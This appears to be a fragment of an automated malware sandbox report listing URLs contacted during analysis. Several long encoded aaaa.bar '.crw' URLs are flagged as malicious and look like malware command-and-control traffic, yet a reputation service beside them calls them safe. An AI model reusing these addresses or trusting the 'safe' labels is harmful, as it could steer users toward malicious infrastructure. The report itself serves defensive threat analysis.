      https://aaaa.bar/jdraw/6ybu_2FNdKF0gG/m7orpeXdQJjdHGv7mDMIL/JfKVVeTDKq1gaDX7/GcXqJLlu546KZ6e/n4P4OzwLSG43PTmkn1/t0lauqlYi/uThwI2_2Bb89U_2F9plY/Zxq7QGyY_2FF4AUNHAt/i342YI4jYPKMWYQUn0qvUq/ia1VXOlbfvfYW/_2BuG_2B/Dlgb1sPi5LA4l6opVIFmhDT/0Z5HvD.crw true
      • Avira URL Cloud: safe
      		 unknown
      https://aaaa.bar/jdraw/WNAlg8cEc/UcfXfHTDCraOPvAxQ0u0/IBGE8nVsnVmaTWmqt_2/FgXrkKfYI9UDVTSC9YOK9U/edsq3qaEaK4UV/nX98HXXg/zJ1jx_2BUw5Fkli5F8AIb_2/FG3fGkSRfJ/J4BestfVNDAUFKDxV/xH_2BYMBJKGO/i9O5kI15Exg/Ujf1s7nWsRKDBP/pBWe2EoKcTyJW0r5TV22O/pk_2FzstpMvpdzlO/Mq8HfsXB/P.crw true
      • Avira URL Cloud: safe
      		 unknown
      https://aaaa.bar/jdraw/gquCtxgLcwr_2F/e84ivzpkcm6RjGEX01HRQ/1JrxRgAMZnr84pf7/d6zLleHTDCpRxyP/mtUcNkhWJ9YEaOQAKu/ZbEc2Du6X/JsZUowsYOu98vblofvm0/EeOsadhZCmRp8ZCZ8KO/Ei99ya5BDB6uxeZYaXwGYu/W7LMC3IC7p7Aq/X8nzxfM9/9M7hUrRFHoU/Zf8MWsTW.crw true
      • Avira URL Cloud: safe
      		 unknown
      https://btloader.com/tag?o=6208086025961472&upapi=true false
      • URL Reputation: safe
      		 unknown
      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2FGETTY_IMAGES%2FIBK%2F542734683__clsfZCtG.jpg false
      • Avira URL Cloud: safe
      		 unknown
      https://aaaa.bar/jdraw/VsEIWZ_2Fbo/VS2aUL2DPkksBz/_2BbHmaiMGFq8k7sf_2FK/_2BE4M1ccGRR2cER/_2ByL6dRggF3y7v/VMJcRRP5R6TojvxFTX/kOSl73q2F/w8Q6acp8KbUFCwTOVCqa/KHPQFw1IxW8ntmCw6R5/_2FriFMvRAS7jKjzJNgjI_/2B3Jlm1ZTjVZL/7f9n_2Fm/j0A3VF_2BTXTJlyVXccf7gs/IMfn4fjHWd/I3IboiX_2F3/uQt3.crw true
      • Avira URL Cloud: safe
      		 unknown
      https://aaaa.bar/jdraw/hqka30Wii/31Oq5rEnSRjUxODbgauN/3Qomlb_2B6I7h2xlFjq/YffmBTpCRrKlCahwBmdROz/L3L_2BpluTz9H/ch5yKjwO/n0FR27CV_2B_2FzpXk9iMJC/P_2Fk2e7Yv/b_2BW31QojrkMDFWC/tZHFJBu8lQql/OZI9lNxt6O0/sFuOUiC9FGcBD8/qZGUVX5D_2FYXiueA015K/GMEnEsw.crw true
      • Avira URL Cloud: safe
      		 unknown